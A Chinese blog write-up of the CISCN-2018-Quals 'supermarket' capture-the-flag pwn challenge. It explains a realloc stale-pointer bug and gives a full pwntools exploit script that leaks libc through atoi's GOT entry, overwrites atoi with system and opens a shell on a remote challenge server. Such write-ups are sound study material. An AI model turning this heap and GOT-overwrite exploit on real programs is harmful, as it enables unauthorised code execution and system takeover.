supermarket CISCN-2018-Quals

最新推荐文章于 2022-03-21 10:14:36 发布
最新推荐文章于 2022-03-21 10:14:36 发布
阅读量697 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/97291703
版权

这个题没有想到有一点 。。。。

参考链接

https://blog.csdn.net/qq_33528164/article/details/80144580

这个题目的漏洞点就是

在 realloc  如果 当重新分配的new_size < pre_size, 返回原指针  否则 重新分配  这个就很真实了

而且他这个 还没有改变用户态指针

如果我们操作一波就可以 用另一个指针 随意操控 里面另一个堆user的值了 那么就可以把desc 的指针类型给换了  换成atoigot 表的  就可以了     然后可以 把atoi 改成system 然后一把梭就可以了

exp 如下

from pwn import *

debug=0

context.log_level='debug'
context.arch='amd64'
libc=ELF("./libc6-i386_2.23-0ubuntu10_amd64.so")
elf=ELF("./supermarket")
if debug:
    io=process('./supermarket')
else:
    io=remote('111.198.29.45',50926)

def add(name,price,size,description):
 io.recvuntil("your choice>>")
 io.sendline("1")
 io.recvuntil("name:")
 io.sendline(name)
 io.recvuntil("price:")
 io.sendline(str(price))
 io.recvuntil("descrip_size:")
 io.sendline(str(size))
 io.recvuntil("description:")
 io.sendline(description)

def dele(name):
 io.recvuntil("your choice>>")
 io.sendline("2")
 io.recvuntil("name:")
 io.sendline(name) 

def show():
 io.recvuntil("your choice>>")
 io.sendline("3")

def edit_price(name,price):
 io.recvuntil("your choice>>")
 io.sendline("4")
 io.recvuntil("name:")
 io.sendline(name)
 io.recvuntil("input the value you want to cut or rise in:")
 io.sendline(str(price))

def edit_desc(name,size,description):
 io.recvuntil("your choice>>")
 io.sendline("5")
 io.recvuntil("name:")
 io.sendline(name)
 io.recvuntil("descrip_size:")
 io.sendline(str(size))
 io.recvuntil("description:")
 io.sendline(description)



got_atoi=elf.got['atoi']

if __name__== "__main__":
 add('pipixia',666,0x80,'a'*0x75)
 add('keer',250,0x20,'b'*0x20)
 edit_desc('pipixia',0xc0,"")
 #gdb.attach(io)
 #pause()
 add('kepler',250,0x50,'c'*7)
 #gdb.attach(io)
 payload='cxk\x00'+'a'*16+p32(0x50)+p32(got_atoi)+p32(0x59)
 edit_desc('pipixia',0x80,payload)
 #gdb.attach(io)
 #pause()
 #gdb.attach(io)
 show()
 #print io.recv()
 io.recvuntil("cxk: price.")
 io.recv(16)
 atoi_addr=u32(io.recv(4))
 log.success("atoi_addr "+hex(atoi_addr))

 libc_base_addr=atoi_addr-libc.sym['atoi']
 log.success("libc_base_addr "+hex(libc_base_addr))

 system_addr=libc_base_addr+libc.sym['system']

 log.success("system_addr "+hex(system_addr))
 #gdb.attach(io)
 edit_desc('cxk',0x50,p32(system_addr))
 io.sendline("/bin/sh;")
 io.interactive()
 io.close()

 

pipixia233333
关注
专栏目录
CISCN-2018-Quals——supermarket分析
Eagle_hwei的博客
02-24 845
supermarket的题目分析 2020-02-01 11:26:17 by hawkJW 题目附件、ida文件及wp链接   这道题实际上我们大体一看,就可以发现是于堆相关的题目,正好用这道题来学习内存的分配机制。这个分配机制是经过查阅的资料综合一些实验,经过自己的理解得出来的,如果有错误,希望各位师傅谅解! 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所...
攻防世界-PWN进阶区-echo_back(CISCN-2018-Quals)
weixin_44145820的博客
03-03 828
本题考查的是对格式化字符串漏洞的利用以及修改_IO_2_1_stdin来实现任意写 题目分析 checksec: 发现保护全开 源码分析: echo函数: 在该函数中有明显的格式化字符串漏洞,但是格式化字符串的长度有限制,最长只能为7,这使得许多利用格式化字符串进行任意内存写的方式不能使用,不过泄露信息还是能够做到的 对于信息泄露,首先我们需要获取libc的基地址,这样我们才能计算system...
CISCN-2018-Quals_MS
M3ng@L的博客
03-07 457
CISCN-2018-Quals_Crypto_MSDescriptionDescriptionDescriptionAnalysisAnalysisAnalysisSolving codeSolving~codeSolving codeReferenceReferenceReference keywords:keywords:keywords: 有限域GF(2)下的矩阵乘法 DescriptionDescriptionDescription from Crypto.Util.numbe
CISCN-2018-Quals-SM1
MangoFengC++
03-21 4079
题目 from Crypto.Util.number import getPrime,long_to_bytes,bytes_to_long from Crypto.Cipher import AES import hashlib from random import randint def gen512num(): order=[] while len(order)!=512: tmp=randint(1,512) if tmp not in order:
CISCN-2018-Quals note-service2
qq_41071646的博客
07-23 986
这几天看 wiki 有点头疼 刷会 攻防世界 (那个echo_back 真的头疼 那个 文件结构 不知道是怎么搞出来的) 哪一行代码也不是很清楚是怎么做的 于是就直接跳过那个题目了 note-service2 这个题用ida 分析的时候 看见 show 不能用 笑容 逐渐 凝固 看见edit 不能用的时候 直接关闭了ida 然后发现保护如下 shellcode 一把梭鸭 ...
记录攻防世界CRYPTO进阶区-2
qq_53087690的博客
12-11 405
flag_in_your_hand1&&flag_in_your_hand 题目来源:CISCN-2018-Quals 下载附件并解压: 1.打开index.html 2…查看网页源码
攻防世界-Web萌新-csaw-ctf-2016-quals-mfw(.git泄露、php语句闭合)
Sea_Sand息禅
04-15 4461
打开网页,日常扫描,发现git泄露: git工具下载相关文件(git工具自行百度): 然而flag.php的内容是这样的没什么用,想着也不会这么简单: 网页源码有这一段: 说明flag应该就在flag.php中,再看看index.php,主要是这一部分: <?php if (isset($_GET['page'])) { $page = $_GET['page']; ...
CSAWCTF-2018-pwn-shellcode 题解
lifanxin的博客
11-29 1366
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本一些细节:wp_shellcode.py 知识点关键字 栈溢出,shellcode拆分+组装 样本 样本来自2018年CSAWCTF的pwn题目shellcode 运行 检查文件,发现有两个可以利用的点:   栈溢出保护未开启;   NX保护未开启,存在RWX段。 $ checksec CSAWCTF-2018-pwn [*] '/home/fanxinli/pwnSample/CSAWCTF-2018/CSAWCTF-2018-pwn'
CISCN 2018 PWN task_supermarket
Bill
04-29 1632
全国大学生信息安全竞赛-PWN 序言 第一次在大赛中做出PWN题, 心情有点小激动. 程序运行 0. 结构体 struct node{ char name[16]; int price; int size; char* des; }commodity[15]; 1.MENU 1. add a commodity 2. del a...
CISCN2018-WP
04-30 698
MISC: 验证码: 用token登录 输入好验证码就可以得到flag Picture: 图片隐写,一下就想到binwalk或者winhex打开试试 binwalk打开无果 将这段数据ctrl+shift+c复制出来 用下面python脚本生成zip文件。 import zlib import binascii import base64 id=”...
2018 CISCN reverse
weixin_30735745的博客
05-10 124
2018 CISCN reverse 这题比赛的时候没做出来,主要是心态崩了看不下去。。赛后看了下网上的wp发现不难,是自己想复杂了。这里将我的思路和exp放出来,希望大家一起交流学习。 main函数 它首先是check了输入的前六个字符是否与“CISCN{”匹配,接着使用strtok函数将字符串以“_”分割为三部分,然后分别对这三部分check。 sub_4012DE函数 关键部分如下 将...
NDIS backdoor
04-06 2364
 I just spotted a scary looking rootkit project:http://www.xfocus.net/tools/200602/uay_source.rarthis is written by a guy called Uay, and it has the makings of a powerful rootkit.He has hook
一月刷题总结
qq_46263951的博客
01-21 2507
攻防世界--mail 布尔盲注,session伪造,format格式化字符串漏洞 攻防世界--weiphp weiphp5.0框架漏洞:.git泄漏、SQL注入、文件上传漏洞(利用.phtml) 高校战疫网络安全分享赛: webtmp pickle反序列化漏洞学习 BUUCTF--[CISCN2019 华北赛区 Day1 Web2]ikun cookie伪造,pickle反序列化 攻防世界--Confusion1 SSTI 攻防世界--Confusion2 md5爆破,cookie伪造,php反序
攻防世界 web高手进阶区 10分题 TimeKeeper
闵行小鱼塘
10-19 1399
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是TimeKeeper的writeup
战力爆表|21支明星战队等你围观!
Cyberpeace的博客
10-22 1591
​​大浪淘沙始见金,风卷残云剩为王 21支高校明星CTF战队初露王者之相 晋级XCTF高校网络安全专题挑战赛总决赛 2021年10月29日-10月30日东莞·华为松山湖园区 集结再出发,踏上新征途! 整装待发之际 小编汇总了21支明星战队的战力信息 快来pick你心目中的最强王者 为王者的上分之路疯狂打call!!! 一.Vidar-Team 杭州电子科技大学 Vidar-Team成立于2008年9月,队名“Vidar”来源于北欧神话"诸神黄昏"中幸免于难、带领人类重建了家园的神Víðarr,是由杭州电子
ciscn 2018 部分writeup
StriveBen的博客
05-07 3961
ciscn 2018 部分writeup flag in your hand 这是一道js解密的题目: 发现checkToken函数数里返回的s===”FAKE-TOKEN”,使用这个字符串却得到wrong,而且ic后面被更改了: 跟踪bm函数: 这里charCodeAt() 方法可返回指定位置的字符的 Unicode 编码; 在ck函数里,ic的值又被更改了,所以要想...
CISCN-2018-Quals 2ex 攻防世界
qq_41071646的博客
06-07 1665
这个题目 感觉 挺。。。。 又是 MIPS框架的东西 本来一直想配置一下ida 那个插件但是 感觉很麻烦 我就没有配置 然后还是用的 jeb 然后 。。。。 跟着跟着就跟丢了 2333 主要对东西不太了解 但是 好好看一下 还是 能跟的 一开始没有看到这个细节 跟到后面发现了这个可疑字符串 去jeb 反编译一下 看看 这nm的不就是base64 看...
[wp] 攻防世界 CISCN-2018-Final blgdel
MercyLin的博客
10-04 1896
访问robots.txt,发现config.txt <?php class master { private $path; private $name; function __construct() { } function stream_open($path) { if(!preg_match('/(.*)\/(.*)$/s',$path,$array,0...
2018年全国大学生信息安全竞赛 CISCN Writeup
热门推荐
aptx4869_li的博客
06-07 1万+
逆向:RE:题目文件:链接:点击打开链接 密码:hyzy这题当时做的时候陷入了出题人的陷阱,上来找到了“关键部分”就开始逆,但是遇到了很多问题,因为有很多函数,而且篇幅都不小,而且每个函数还要调用其他一大堆函数,这就大大增加了工作量,后面实在看不下去了,就放弃了。后面找到一些大佬的writeup看了看,原来是思路的问题:总结一下:逆向赛题一般工作量不会大到让你逆不了,一下锁定了十七八个函数肯定是有...
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:...而Quals是一种基于ASIS的工具,它可以用于静态代码分析和漏洞检测。Quals可以帮助开发人员发现和修复代码中的安全漏洞,从而提高软件的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值